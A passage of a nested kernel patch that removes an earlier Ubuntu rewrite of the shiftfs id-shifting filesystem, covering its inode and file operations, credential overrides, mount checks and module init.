-+	} else {
-+		err = shiftfs_removexattr(dentry, handler->name);
-+	}
- 
--static const struct super_operations shiftfs_super_ops = {
--	.put_super	= shiftfs_put_super,
--	.show_options	= shiftfs_show_options,
--	.statfs		= shiftfs_statfs,
-+	if (!err)
-+		shiftfs_copyattr(loweri, inode);
-+
-+	return err;
-+}
-+
-+static const struct xattr_handler
-+shiftfs_posix_acl_access_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_ACCESS,
-+	.flags = ACL_TYPE_ACCESS,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--struct shiftfs_data {
--	void *data;
--	const char *path;
-+static const struct xattr_handler
-+shiftfs_posix_acl_default_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
-+	.flags = ACL_TYPE_DEFAULT,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
--			      int silent)
--{
--	struct shiftfs_data *data = raw_data;
--	char *name = kstrdup(data->path, GFP_KERNEL);
--	int err = -ENOMEM;
--	struct shiftfs_super_info *ssi = NULL;
--	struct path path;
--	struct dentry *dentry;
-+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	if (!name)
--		goto out;
-+#define shiftfs_get_acl NULL
- 
--	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
--	if (!ssi)
--		goto out;
-+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	err = -EPERM;
--	err = shiftfs_parse_options(ssi, data->data);
-+static const struct inode_operations shiftfs_dir_inode_operations = {
-+	.lookup		= shiftfs_lookup,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.setattr	= shiftfs_setattr,
-+	.create		= shiftfs_create,
-+	.mknod		= shiftfs_mknod,
-+	.permission	= shiftfs_permission,
-+	.getattr	= shiftfs_getattr,
-+	.listxattr	= shiftfs_listxattr,
-+	.get_acl	= shiftfs_get_acl,
-+};
-+
-+static const struct inode_operations shiftfs_file_inode_operations = {
-+	.fiemap		= shiftfs_fiemap,
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+	.tmpfile	= shiftfs_tmpfile,
-+};
-+
-+static const struct inode_operations shiftfs_special_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static const struct inode_operations shiftfs_symlink_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_link	= shiftfs_get_link,
-+	.listxattr	= shiftfs_listxattr,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static struct file *shiftfs_open_realfile(const struct file *file,
-+					  struct path *realpath)
-+{
-+	struct file *lowerf;
-+	const struct cred *oldcred;
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = realpath->dentry->d_inode;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	/* XXX: open_with_fake_path() not gauranteed to stay around, if
-+	 * removed use dentry_open() */
-+	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
-+	revert_creds(oldcred);
-+
-+	return lowerf;
-+}
-+
-+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-+
-+static int shiftfs_change_flags(struct file *file, unsigned int flags)
-+{
-+	struct inode *inode = file_inode(file);
-+	int err;
-+
-+	/* if some flag changed that cannot be changed then something's amiss */
-+	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
-+		return -EIO;
-+
-+	flags &= SHIFTFS_SETFL_MASK;
-+
-+	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
-+		return -EPERM;
-+
-+	if (flags & O_DIRECT) {
-+		if (!file->f_mapping->a_ops ||
-+		    !file->f_mapping->a_ops->direct_IO)
-+			return -EINVAL;
-+	}
-+
-+	if (file->f_op->check_flags) {
-+		err = file->f_op->check_flags(flags);
-+		if (err)
-+			return err;
-+	}
-+
-+	spin_lock(&file->f_lock);
-+	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
-+	spin_unlock(&file->f_lock);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_open(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
-+	struct shiftfs_file_info *file_info;
-+	struct file *realfile;
-+	struct path *realpath;
-+
-+	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
-+	if (!file_info)
-+		return -ENOMEM;
-+
-+	realpath = &file_info->realpath;
-+	realpath->mnt = ssi->mnt;
-+	realpath->dentry = file->f_path.dentry->d_fsdata;
-+
-+	realfile = shiftfs_open_realfile(file, realpath);
-+	if (IS_ERR(realfile)) {
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+		return PTR_ERR(realfile);
-+	}
-+
-+	file->private_data = file_info;
-+	file_info->realfile = realfile;
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+
-+	if (file_info) {
-+		if (file_info->realfile)
-+			fput(file_info->realfile);
-+
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	}
-+
-+	return 0;
-+}
-+
-+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct inode *realinode = file_inode(file)->i_private;
-+
-+	return generic_file_llseek_size(file, offset, whence,
-+					realinode->i_sb->s_maxbytes,
-+					i_size_read(realinode));
-+}
-+
-+/* XXX: Need to figure out what to to about atime updates, maybe other
-+ * timestamps too ... ref. ovl_file_accessed() */
-+
-+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
-+{
-+	int ifl = iocb->ki_flags;
-+	rwf_t flags = 0;
-+
-+	if (ifl & IOCB_NOWAIT)
-+		flags |= RWF_NOWAIT;
-+	if (ifl & IOCB_HIPRI)
-+		flags |= RWF_HIPRI;
-+	if (ifl & IOCB_DSYNC)
-+		flags |= RWF_DSYNC;
-+	if (ifl & IOCB_SYNC)
-+		flags |= RWF_SYNC;
-+
-+	return flags;
-+}
-+
-+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
-+			    shiftfs_iocb_to_rwf(iocb));
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct inode *inode = file_inode(file);
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	inode_lock(inode);
-+	/* Update mode */
-+	shiftfs_copyattr(inode->i_private, inode);
-+	ret = file_remove_privs(file);
-+	if (ret)
-+		goto out_unlock;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	file_start_write(lowerfd.file);
-+	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
-+			     shiftfs_iocb_to_rwf(iocb));
-+	file_end_write(lowerfd.file);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(inode->i_private, inode);
-+
-+	fdput(lowerfd);
-+
-+out_unlock:
-+	inode_unlock(inode);
-+	return ret;
-+}
-+
-+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
-+			 int datasync)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	if (!realfile->f_op->mmap)
-+		return -ENODEV;
-+
-+	if (WARN_ON(file != vma->vm_file))
-+		return -EIO;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	vma->vm_file = get_file(realfile);
-+	ret = call_mmap(vma->vm_file, vma);
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	if (ret)
-+		fput(realfile); /* Drop refcount from new vm_file value */
-+	else
-+		fput(file); /* Drop refcount from previous vm_file value */
-+
-+	return ret;
-+}
-+
-+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
-+			      loff_t len)
-+{
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = inode->i_private;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
-+			   int advice)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+					const struct cred **oldcred,
-+					struct cred **newcred)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	/* clear all caps to prevent bypassing capable() checks */
-+	cap_clear((*newcred)->cap_bset);
-+	cap_clear((*newcred)->cap_effective);
-+	cap_clear((*newcred)->cap_inheritable);
-+	cap_clear((*newcred)->cap_permitted);
-+
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
-+
-+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
-+					      struct cred *newcred)
-+{
-+	return shiftfs_revert_object_creds(oldcred, newcred);
-+}
-+
-+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
-+			       unsigned long arg)
-+{
-+	long ret = 0;
-+	struct fd lowerfd;
-+	struct cred *newcred;
-+	const struct cred *oldcred;
-+	struct super_block *sb = file->f_path.dentry->d_sb;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	if (ret)
-+		goto out_fdput;
-+
-+	ret = vfs_ioctl(lowerfd.file, cmd, arg);
-+
-+	shiftfs_revert_ioctl_creds(oldcred, newcred);
-+
-+	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
-+	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
-+
-+out_fdput:
-+	fdput(lowerfd);
-+
-+	return ret;
-+}
-+
-+static long shiftfs_ioctl(struct file *file, unsigned int cmd,
-+			  unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC_GETVERSION:
-+		/* fall through */
-+	case FS_IOC_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOTTY;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
-+				 unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC32_GETVERSION:
-+		/* fall through */
-+	case FS_IOC32_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC32_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOIOCTLCMD;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+enum shiftfs_copyop {
-+	SHIFTFS_COPY,
-+	SHIFTFS_CLONE,
-+	SHIFTFS_DEDUPE,
-+};
-+
-+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
-+				struct file *file_out, loff_t pos_out, u64 len,
-+				unsigned int flags, enum shiftfs_copyop op)
-+{
-+	ssize_t ret;
-+	struct fd real_in, real_out;
-+	const struct cred *oldcred;
-+	struct inode *inode_out = file_inode(file_out);
-+	struct inode *loweri = inode_out->i_private;
-+
-+	ret = shiftfs_real_fdget(file_out, &real_out);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_real_fdget(file_in, &real_in);
-+	if (ret) {
-+		fdput(real_out);
-+		return ret;
-+	}
-+
-+	oldcred = shiftfs_override_creds(inode_out->i_sb);
-+	switch (op) {
-+	case SHIFTFS_COPY:
-+		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
-+					  pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_CLONE:
-+		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
-+					   pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_DEDUPE:
-+		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
-+						real_out.file, pos_out, len,
-+						flags);
-+		break;
-+	}
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode_out);
-+
-+	fdput(real_in);
-+	fdput(real_out);
-+
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       size_t len, unsigned int flags)
-+{
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
-+				SHIFTFS_COPY);
-+}
-+
-+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       loff_t len, unsigned int remap_flags)
-+{
-+	enum shiftfs_copyop op;
-+
-+	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
-+		return -EINVAL;
-+
-+	if (remap_flags & REMAP_FILE_DEDUP)
-+		op = SHIFTFS_DEDUPE;
-+	else
-+		op = SHIFTFS_CLONE;
-+
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
-+				remap_flags, op);
-+}
-+
-+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
-+{
-+	const struct cred *oldcred;
-+	int err = -ENOTDIR;
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	err = iterate_dir(realfile, ctx);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+const struct file_operations shiftfs_file_operations = {
-+	.open			= shiftfs_open,
-+	.release		= shiftfs_release,
-+	.llseek			= shiftfs_llseek,
-+	.read_iter		= shiftfs_read_iter,
-+	.write_iter		= shiftfs_write_iter,
-+	.fsync			= shiftfs_fsync,
-+	.mmap			= shiftfs_mmap,
-+	.fallocate		= shiftfs_fallocate,
-+	.fadvise		= shiftfs_fadvise,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.copy_file_range	= shiftfs_copy_file_range,
-+	.remap_file_range	= shiftfs_remap_file_range,
-+};
-+
-+const struct file_operations shiftfs_dir_operations = {
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.fsync			= shiftfs_fsync,
-+	.iterate_shared		= shiftfs_iterate_shared,
-+	.llseek			= shiftfs_llseek,
-+	.open			= shiftfs_open,
-+	.read			= generic_read_dir,
-+	.release		= shiftfs_release,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+};
-+
-+static const struct address_space_operations shiftfs_aops = {
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
-+	.direct_IO	= noop_direct_IO,
-+};
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry)
-+{
-+	struct inode *loweri;
-+
-+	inode->i_ino = ino;
-+	inode->i_flags |= S_NOCMTIME;
-+
-+	mode &= S_IFMT;
-+	inode->i_mode = mode;
-+	switch (mode & S_IFMT) {
-+	case S_IFDIR:
-+		inode->i_op = &shiftfs_dir_inode_operations;
-+		inode->i_fop = &shiftfs_dir_operations;
-+		break;
-+	case S_IFLNK:
-+		inode->i_op = &shiftfs_symlink_inode_operations;
-+		break;
-+	case S_IFREG:
-+		inode->i_op = &shiftfs_file_inode_operations;
-+		inode->i_fop = &shiftfs_file_operations;
-+		inode->i_mapping->a_ops = &shiftfs_aops;
-+		break;
-+	default:
-+		inode->i_op = &shiftfs_special_inode_operations;
-+		init_special_inode(inode, mode, dev);
-+		break;
-+	}
-+
-+	if (!dentry)
-+		return;
-+
-+	loweri = dentry->d_inode;
-+	if (!loweri->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	shiftfs_copyattr(loweri, inode);
-+	shiftfs_copyflags(loweri, inode);
-+	set_nlink(inode, loweri->i_nlink);
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	if (sbinfo->passthrough)
-+		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
- 	if (err)
--		goto out;
-+		return err;
- 
--	/* to mark a mount point, must be real root */
--	if (ssi->mark && !capable(CAP_SYS_ADMIN))
--		goto out;
-+	if (!shiftfs_passthrough_statfs(sbinfo))
-+		buf->f_type = sb->s_magic;
- 
--	/* else to mount a mark, must be userns admin */
--	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
--		goto out;
-+	return 0;
-+}
- 
--	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+static void shiftfs_evict_inode(struct inode *inode)
-+{
-+	struct inode *loweri = inode->i_private;
-+
-+	clear_inode(inode);
-+
-+	if (loweri)
-+		iput(loweri);
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo) {
-+		mntput(sbinfo->mnt);
-+		put_cred(sbinfo->creator_cred);
-+		kfree(sbinfo);
-+	}
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
-+	&shiftfs_posix_acl_access_xattr_handler,
-+	&shiftfs_posix_acl_default_xattr_handler,
-+#endif
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static inline bool passthrough_is_subset(int old_flags, int new_flags)
-+{
-+	if ((new_flags & old_flags) != new_flags)
-+		return false;
-+
-+	return true;
-+}
-+
-+static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
-+{
-+	int err;
-+	struct shiftfs_super_info new = {};
-+	struct shiftfs_super_info *info = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(&new, data);
- 	if (err)
--		goto out;
-+		return err;
-+
-+	/* Mark mount option cannot be changed. */
-+	if (info->mark || (info->mark != new.mark))
-+		return -EPERM;
-+
-+	if (info->passthrough != new.passthrough) {
-+		/* Don't allow exceeding passthrough options of mark mount. */
-+		if (!passthrough_is_subset(info->info_mark->passthrough,
-+					   info->passthrough))
-+			return -EPERM;
-+
-+		info->passthrough = new.passthrough;
-+	}
-+
-+	return 0;
-+}
- 
--	err = -EPERM;
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
-+	.statfs		= shiftfs_statfs,
-+	.remount_fs	= shiftfs_remount,
-+	.evict_inode	= shiftfs_evict_inode,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	int err;
-+	struct path path = {};
-+	struct shiftfs_super_info *sbinfo_mp;
-+	char *name = NULL;
-+	struct inode *inode = NULL;
-+	struct dentry *dentry = NULL;
-+	struct shiftfs_data *data = raw_data;
-+	struct shiftfs_super_info *sbinfo = NULL;
-+
-+	if (!data->path)
-+		return -EINVAL;
-+
-+	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
-+	if (!sb->s_fs_info)
-+		return -ENOMEM;
-+	sbinfo = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(sbinfo, data->data);
-+	if (err)
-+		return err;
-+
-+	/* to mount a mark, must be userns admin */
-+	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	name = kstrdup(data->path, GFP_KERNEL);
-+	if (!name)
-+		return -ENOMEM;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out_free_name;
- 
- 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
- 		err = -ENOTDIR;
--		goto out_put;
-+		goto out_put_path;
- 	}
- 
--	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
--	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
--		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
--		err = -EINVAL;
--		goto out_put;
--	}
-+	if (sbinfo->mark) {
-+		struct super_block *lower_sb = path.mnt->mnt_sb;
-+
-+		/* to mark a mount point, must root wrt lower s_user_ns */
-+		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
-+			err = -EPERM;
-+			goto out_put_path;
-+		}
- 
--	if (ssi->mark) {
- 		/*
- 		 * this part is visible unshifted, so make sure no
- 		 * executables that could be used to give suid
- 		 * privileges
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
--		ssi->mnt = path.mnt;
--		dentry = path.dentry;
--	} else {
--		struct shiftfs_super_info *mp_ssi;
- 
- 		/*
--		 * this leg executes if we're admin capable in
--		 * the namespace, so be very careful
-+		 * Handle nesting of shiftfs mounts by referring this mark
-+		 * mount back to the original mark mount. This is more
-+		 * efficient and alleviates concerns about stack depth.
- 		 */
-+		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
-+			sbinfo_mp = lower_sb->s_fs_info;
-+
-+			/* Doesn't make sense to mark a mark mount */
-+			if (sbinfo_mp->mark) {
-+				err = -EINVAL;
-+				goto out_put_path;
-+			}
-+
-+			if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+						   sbinfo->passthrough)) {
-+				err = -EPERM;
-+				goto out_put_path;
-+			}
-+
-+			sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+			dentry = dget(path.dentry->d_fsdata);
-+		} else {
-+			sbinfo->mnt = mntget(path.mnt);
-+			dentry = dget(path.dentry);
-+		}
-+
-+		sbinfo->creator_cred = prepare_creds();
-+		if (!sbinfo->creator_cred) {
-+			err = -ENOMEM;
-+			goto out_put_path;
-+		}
-+	} else {
-+		/*
-+		 * This leg executes if we're admin capable in the namespace,
-+		 * so be very careful.
-+		 */
-+		err = -EPERM;
- 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
--			goto out_put;
--		mp_ssi = path.dentry->d_sb->s_fs_info;
--		if (!mp_ssi->mark)
--			goto out_put;
--		ssi->mnt = mntget(mp_ssi->mnt);
-+			goto out_put_path;
-+
-+		sbinfo_mp = path.dentry->d_sb->s_fs_info;
-+		if (!sbinfo_mp->mark)
-+			goto out_put_path;
-+
-+		if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+					   sbinfo->passthrough))
-+			goto out_put_path;
-+
-+		sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		path_put(&path);
-+		sbinfo->info_mark = sbinfo_mp;
-+	}
-+
-+	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put_path;
-+	}
-+
-+	inode = new_inode(sb);
-+	if (!inode) {
-+		err = -ENOMEM;
-+		goto out_put_path;
- 	}
--	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
--	sb->s_fs_info = ssi;
-+	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
-+
-+	ihold(dentry->d_inode);
-+	inode->i_private = dentry->d_inode;
-+
- 	sb->s_magic = SHIFTFS_MAGIC;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_flags |= SB_POSIXACL;
-+	sb->s_root = d_make_root(inode);
-+	if (!sb->s_root) {
-+		err = -ENOMEM;
-+		goto out_put_path;
-+	}
-+
- 	sb->s_root->d_fsdata = dentry;
-+	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
- 
--	return 0;
-+	dentry = NULL;
-+	err = 0;
- 
-- out_put:
-+out_put_path:
- 	path_put(&path);
-- out:
-+
-+out_free_name:
- 	kfree(name);
--	kfree(ssi);
-+
-+	dput(dentry);
-+
- 	return err;
- }
- 
-@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
-+	shiftfs_file_info_cache = kmem_cache_create(
-+		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
-+		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+	if (!shiftfs_file_info_cache)
-+		return -ENOMEM;
-+
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
-+	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
- MODULE_AUTHOR("James Bottomley");
--MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
-+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
-+MODULE_DESCRIPTION("id shifting filesystem");
- MODULE_LICENSE("GPL v2");
- module_init(shiftfs_init)
- module_exit(shiftfs_exit)
--- 
-2.39.2
-
-From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:13 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
